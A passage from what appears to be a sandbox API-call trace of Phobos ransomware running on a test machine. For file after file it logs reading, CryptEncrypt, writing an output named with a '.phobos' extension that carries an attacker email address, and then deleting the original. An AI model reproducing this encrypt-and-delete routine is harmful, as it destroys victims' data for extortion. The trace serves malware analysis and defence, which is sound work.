HALPmcxz\\Desktop\\OZnEXi rpCg2\\zBP9e1bnfyQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\zbp9e1bnfyq.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.020] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.020] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\zBP9e1bnfyQ.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\zbp9e1bnfyq.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.021] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0196.021] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.021] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7080, lpOverlapped=0x0) returned 1 [0196.023] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7090, dwBufLen=0x7090 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7090) returned 1 [0196.023] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7090, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7090, lpOverlapped=0x0) returned 1 [0196.024] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0196.024] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.024] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.024] CryptDestroyKey (hKey=0xa32c28) returned 1 [0196.024] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.024] CryptDestroyKey (hKey=0xa32d28) returned 1 [0196.024] CloseHandle (hObject=0x180) returned 1 [0196.024] CloseHandle (hObject=0x134) returned 1 [0196.024] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\zBP9e1bnfyQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\zbp9e1bnfyq.mkv")) returned 1 [0196.025] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pcEMxAF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pcemxaf.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.026] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=31065) returned 1 [0196.026] CloseHandle (hObject=0x134) returned 1 [0196.026] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pcEMxAF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pcemxaf.flv")) returned 0x20 [0196.026] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pcEMxAF.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pcemxaf.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pcEMxAF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pcemxaf.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.026] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.026] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pcEMxAF.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pcemxaf.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.027] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0196.027] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.027] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7959, lpOverlapped=0x0) returned 1 [0196.029] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7960, dwBufLen=0x7960 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7960) returned 1 [0196.030] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7960, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7960, lpOverlapped=0x0) returned 1 [0196.031] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0196.031] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.031] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.031] CryptDestroyKey (hKey=0xa32c28) returned 1 [0196.031] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.031] CryptDestroyKey (hKey=0xa32d28) returned 1 [0196.031] CloseHandle (hObject=0x134) returned 1 [0196.031] CloseHandle (hObject=0x180) returned 1 [0196.031] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pcEMxAF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pcemxaf.flv")) returned 1 [0196.032] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pGvn9-QR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pgvn9-qr.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.033] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=33872) returned 1 [0196.033] CloseHandle (hObject=0x180) returned 1 [0196.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pGvn9-QR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pgvn9-qr.m4a")) returned 0x20 [0196.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pGvn9-QR.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pgvn9-qr.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pGvn9-QR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pgvn9-qr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.033] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.033] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pGvn9-QR.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pgvn9-qr.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.034] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0196.034] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.034] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8450, lpOverlapped=0x0) returned 1 [0196.070] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8460, dwBufLen=0x8460 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8460) returned 1 [0196.071] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8460, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8460, lpOverlapped=0x0) returned 1 [0196.072] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0196.072] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.072] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.072] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.072] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.072] CryptDestroyKey (hKey=0xa32d28) returned 1 [0196.072] CloseHandle (hObject=0x180) returned 1 [0196.072] CloseHandle (hObject=0x134) returned 1 [0196.072] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pGvn9-QR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pgvn9-qr.m4a")) returned 1 [0196.073] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Uw9MMlJNvm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uw9mmljnvm.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.074] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=35005) returned 1 [0196.074] CloseHandle (hObject=0x134) returned 1 [0196.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Uw9MMlJNvm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uw9mmljnvm.mkv")) returned 0x20 [0196.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Uw9MMlJNvm.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uw9mmljnvm.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Uw9MMlJNvm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uw9mmljnvm.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.075] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.075] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Uw9MMlJNvm.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uw9mmljnvm.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.076] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0196.076] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.076] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x88bd, lpOverlapped=0x0) returned 1 [0196.088] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x88c0, dwBufLen=0x88c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x88c0) returned 1 [0196.088] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x88c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x88c0, lpOverlapped=0x0) returned 1 [0196.090] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0196.090] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.090] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.090] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.090] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.090] CryptDestroyKey (hKey=0xa32d28) returned 1 [0196.090] CloseHandle (hObject=0x134) returned 1 [0196.090] CloseHandle (hObject=0x180) returned 1 [0196.090] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Uw9MMlJNvm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uw9mmljnvm.mkv")) returned 1 [0196.091] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\veaj0CBQm33.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\veaj0cbqm33.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.092] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=64817) returned 1 [0196.092] CloseHandle (hObject=0x180) returned 1 [0196.092] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\veaj0CBQm33.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\veaj0cbqm33.bmp")) returned 0x20 [0196.092] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\veaj0CBQm33.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\veaj0cbqm33.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\veaj0CBQm33.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\veaj0cbqm33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.093] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.093] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\veaj0CBQm33.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\veaj0cbqm33.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.094] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0196.094] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.094] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfd31, lpOverlapped=0x0) returned 1 [0196.095] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xfd40, dwBufLen=0xfd40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xfd40) returned 1 [0196.096] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xfd40, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xfd40, lpOverlapped=0x0) returned 1 [0196.098] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0196.098] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.098] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.098] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.098] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.098] CryptDestroyKey (hKey=0xa32d28) returned 1 [0196.098] CloseHandle (hObject=0x180) returned 1 [0196.098] CloseHandle (hObject=0x134) returned 1 [0196.098] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\veaj0CBQm33.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\veaj0cbqm33.bmp")) returned 1 [0196.099] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vi6xmFqnUtCPLKmu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vi6xmfqnutcplkmu.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.100] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=92639) returned 1 [0196.100] CloseHandle (hObject=0x134) returned 1 [0196.100] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vi6xmFqnUtCPLKmu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vi6xmfqnutcplkmu.wav")) returned 0x20 [0196.100] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vi6xmFqnUtCPLKmu.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vi6xmfqnutcplkmu.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vi6xmFqnUtCPLKmu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vi6xmfqnutcplkmu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.101] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.101] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vi6xmFqnUtCPLKmu.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vi6xmfqnutcplkmu.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.101] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0196.101] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.102] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x169df, lpOverlapped=0x0) returned 1 [0196.103] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x169e0, dwBufLen=0x169e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x169e0) returned 1 [0196.104] WriteFile (in: hFile=0x180, 